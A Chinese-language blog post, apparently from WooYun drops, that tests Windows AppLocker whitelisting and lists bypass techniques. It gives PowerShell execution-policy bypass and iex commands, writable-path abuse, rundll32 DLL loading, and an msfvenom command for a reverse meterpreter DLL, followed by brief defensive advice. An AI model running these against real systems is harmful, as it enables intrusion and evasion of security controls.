Bypass Windows AppLocker
0x00 前言
上一次我們對McAfee Application Control做了測試,這次接著對另一款白名單工具Windows AppLocker進行測試,分享一下其中的攻防技術。
0x01 簡介
Windows AppLocker,即“應用程式控制策略”,可用來對可執行程式、安裝程式和指令碼進行控制,之前只能支援windows7 Enterprise、windows7 Ultimate和WindowsServer2008 R2,但是微軟在2012年10月18日將其更新,已支援Windows8.1,Windows Server2012 R2,WindowsServer2012和Windows8 Enterprise
如圖
AppLocker可對以下檔案格式建立規則,限制其執行
下面我們就實際測試一下相關功能
0x02 配置
測試環境:
#!bash
OS:Windows7 Ultimate x86
1、開啟服務
進入計算機管理-服務-Application Identity,將服務設定為開啟
如圖
2、進入AppLocker配置介面
輸入secpol.msc進入本地安全策略-應用程式控制策略-AppLocker
或者gpedit.msc-計算機配置-Windows設定-安全設定-應用程式控制策略-AppLocker
如圖
3、配置規則
對可執行檔案設定預設規則:
- 允許本地管理員組的成員執行所有應用程式。
- 允許 Everyone 組的成員執行位於 Windows 資料夾中的應用程式。
- 允許 Everyone 組的成員執行位於 Program Files 資料夾中的應用程式。
如圖
對指令碼設定預設規則:
- 允許本地管理員組的成員執行所有指令碼。
- 允許 Everyone 組的成員執行位於 Program Files 資料夾中的指令碼。
- 允許 Everyone 組的成員執行位於 Windows 資料夾中的指令碼。
如圖
開啟預設規則後,除了預設路徑可以執行外,其他路徑均無法執行程式和指令碼
0x03 測試
1、執行exe
2、執行指令碼
0x04 安全機制分析
透過測試發現設定的規則已經生效,能夠阻止信任路徑外的exe和指令碼執行,但是對以下方面沒有做限制:
- 記憶體
- Office 宏
- HTML Applications,即hta檔案
- powershell
而我們已經掌握的繞過技術有:
- 利用hta檔案
- 利用jscript
- 利用powershell
- 利用InstallUtil
- 利用regsvcs
再加上新學來的技巧,我們最終發現瞭如下可供利用的方法:)
0x05 繞過方法
1、hta
成功
(可參照/tips/?id=10667)
可用來執行vbs和JavaScript指令碼
2、提權
提權到管理員許可權,即可執行突破AppLocker的限制,執行exe和指令碼
3、powershell
(1)可以執行ps指令碼
#!bash
PowerShell.exe -ExecutionPolicy Bypass -File
(2)可以透過如下方式執行ps指令碼
#!bash
Get-Content script.txt | iex
(3)可以利用快捷方式執行Powershell
成功
(可參照/tips/?id=10667)
4、程式注入
既然可以執行powershell指令碼,那麼就可以反彈出meterpreter
然後嘗試程式注入
(可參照/tips/?id=11305)
如果注入到普通許可權程式,無法執行exe和指令碼
如果是system許可權程式,可以執行exe和指令碼
5、查詢可利用的檔案路徑
透過ps指令碼掃描可寫入的路徑
下載地址:http://go.mssec.se/AppLockerBC
(如果無法下載,我已將該指令碼上傳至Github)
測試如圖
執行後會自動掃描出可利用的路徑
比如選擇路徑:c:\Windows\Tasks
正常執行calc.js會被攔截
但是copy calc.js c:\Windows\Tasks後
再執行c:\Windows\Tasks\calc.js,可以繞過攔截
如圖
6、rundll32
(1)執行JavaScript
a、直接彈回一個Http shell
(可參照/tips/?id=11764)
但無法繞過對執行exe和指令碼的攔截
b、利用JavaScript執行powershell命令返回HTTP shell
(2)載入第三方dll
a、自己編寫的dll
參考資料:
http://blog.didierstevens.com/2010/02/04/cmd-dll/
按照dll的格式,自己編寫並生成dll上傳
執行
#!bash
rundll32.exe cmd.dll,Control_RunDLL
彈出一個cmd
如圖
b、反彈meterpreter
kali下:
#!bash
msfvenom -p windows/meterpreter/reverse_http -f dll LHOST=192.168.174.133 LPORT=8080>./a.dll
生成a.dll,然後上傳至測試主機
執行
#!bash
rundll32.exe a.dll,Control_RunDLL
即可上線
如圖
7、利用InstallUtil
利用InstallUtil.exe直接執行shellcode 成功
如果有Microsoft .NET Framework 4.0環境,可用來執行exe
(可參照/tips/?id=8701,/tips/?id=8862)
8、利用regsvcs
成功
(可參照/tips/?id=10667)
0x06 防禦
- 嚴格控制檔案寫入許可權
- 禁用mshta.exe阻止hta的執行
- 禁用powershell
- 防止被提權
0x07 小結
隨著研究的逐漸深入,我們不難發現:利用InstallUtil、regsvcs是繞過白名單限制的一把利器,無論是攻擊還是防禦,對此部分都要尤其重視。
而利用rundll32.exe的技巧,正在慢慢被髮掘。
0x08 參考資料:
- https://technet.microsoft.com/en-us/library/dd759117.aspx
- https://technet.microsoft.com/en-us/library/hh831440.aspx
- http://dfir-blog.com/2016/01/03/protecting-windows-networks-applocker/
- https://mssec.wordpress.com/2015/10/22/applocker-bypass-checker/
- https://www.attackdebris.com/?p=143
- http://blog.didierstevens.com/2010/02/04/cmd-dll/
相關檔案下載地址:
https://github.com/3gstudent/Bypass-Windows-AppLocker
本文由三好學生原創並首發於烏雲drops,轉載請註明
相關文章
- bypass disable_functionFunction
- IPS BYPASS姿勢
- Bypass IE XSS FilterFilter
- 內網簡單bypass內網
- bypass waf測試_rce
- 利用CMSTP繞過AppLocker並執行程式碼APP行程
- BarracudaWSFv4.x-Bypass&PersistentVulnerabilities
- WAF Bypass 介紹與實戰
- 如何實現核心旁路(Kernel bypass)?
- oracle hint /*+ BYPASS_UJVC*/ 使用案例Oracle
- 【奇淫巧技】Bypass阿里雲注入阿里
- Win7預裝版AppLocker功能讓企業更放心Win7APP
- 一個 Chrome XSS Filter Bypass 的分析ChromeFilter
- Bypass McAfee Application Control——Code ExecutionAPP
- Use SCT to Bypass Application Whitelisting ProtectionAPP
- oracle 多表連合修改----BYPASS_UJVC(轉)Oracle
- 網路安全Bypass網路卡詳細講解
- java高版本下各種JNDI Bypass方法復現Java
- HTTPS post: bypass SSL security check and trust all the hostsHTTPRust
- Bypass McAfee Application Control--Write&Read ProtectionAPP
- bypass網路卡:助力網路安全 掌控資料主權
- 聯瑞Bypass網路卡:築牢網路安全“防火牆”防火牆
- bypass-paywalls-chrome:chrome繞過付費牆外掛Chrome
- 新品釋出:聯瑞推出雙埠萬兆Bypass網路卡
- MySQL隱碼攻擊之Fuzz測試&Bypass WAF小結MySql
- bypass網路卡:公開IP屬地觸碰了誰的底線
- 使用HTTP頭進行403繞過 速率繞過 Rate Limit BypassHTTPMIT
- salesforce零基礎學習(一百三十一)Validation 一次的bypass設計Salesforce
- MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) VulnerabilityPHPFunctionREM
- [原創]一個32位程式bypass win7 - win10 UAC(x86/x64)Win7Win10
- CVE2017-12615漏洞復現( tomcat JSP Upload Bypass /Remote Code Execution)TomcatJSREM
- struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command executionREM
- Windows API 之 Windows ServiceWindowsAPI
- Windows (wince、 windows mobile、windows phone)錯誤程式碼大全Windows
- WINDOWS-windows配置固定IP地址Windows
- 關於Windows外殼(Windows Shell)Windows
- Windows 10 終於幹掉了 Windows 7!Windows
- 微軟釋出Windows 10 Windows Defender中心微軟Windows